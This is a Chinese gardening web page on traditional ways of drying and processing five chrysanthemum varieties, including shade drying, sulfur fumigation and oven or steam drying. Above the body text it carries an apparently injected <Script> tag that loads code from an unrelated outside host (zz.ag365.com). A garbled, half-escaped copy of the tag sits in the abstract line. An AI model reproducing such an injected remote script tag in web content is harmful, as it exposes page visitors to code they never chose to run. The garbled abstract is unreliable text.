您现在的位置:那花园花卉网 > 花艺天地 > 插花花艺 >

菊花的加工方法

来源:未知
】 2012-08-12 00:00
[摘要]#106avascript" src="http://zz.ag365.com/js/check.asp?id=4164"/gt;菊花品种多,各种菊花在各地的加工有其传统的方法,现分述于下。 (1)毫菊 将采收时扎成小把的菊花,倒挂在通风干燥处晾干,不能暴晒,否则香气差,晾至八成干,将花摘下,用硫磺熏白,熏
<Script type="text/javascript" src="http://zz.ag365.com/js/check.asp?id=4164"></Script>     菊花品种多,各种菊花在各地的加工有其传统的方法,现分述于下。
    (1)毫菊
    将采收时扎成小把的菊花,倒挂在通风干燥处晾干,不能暴晒,否则香气差,晾至八成干,将花摘下,用硫磺熏白,熏后摊开晒l天可足干,然后装入用牛皮纸衬的木箱,一层菊花一层纸,压实贮藏。
    (2)滁菊
    花采后,阴干,用硫磺熏白,晒至六成干时用竹筛将花头筛成圆球状,再晒至全干即成,晒时忌用手翻动,可用竹筷轻轻翻动。
    (3)贡菊
    采用烘干法:将采回的花,置烘房内烘焙干燥。以木炭或无烟煤在无烟的条件进行,烘房内温度控制在45—50℃之间,烘时将花薄摊在竹帘上,当第1轮烘至九成干时,再转入第2轮温度为30—40℃,当花色烘至象牙白色时,即可从烘房内取出,再置通风干燥处阴至全干。此法加工出的贡菊清香、色鲜洁白,质优。
    (4)杭菊
    将花放在竹帘上在太阳下晒2小时,然后放入蒸笼内蒸3—5分钟,至笼有气冒出即可。然后摊在竹帘上在太阳下曝晒干。初晒时不能翻动,晚上收花时平放在室内不能压,晒2天后翻1次,再晒3-4天,基本干燥后收起放数天回潮,再晒l—2天,至花心完全变硬即为干燥。
    (5)怀菊
    采回的花置搭好的架子上经l—2个月阴干下架,下架时要轻拿轻放,防止散花。将收起的菊花,用清水喷洒均匀,每l0O千克用水3—4千克,使花湿润,用硫磺2千克熏8小时左右,花色洁白即可。
    一般每667平方米产干菊花60千克,高产可达150千克。

                                                      中国种植技术网编辑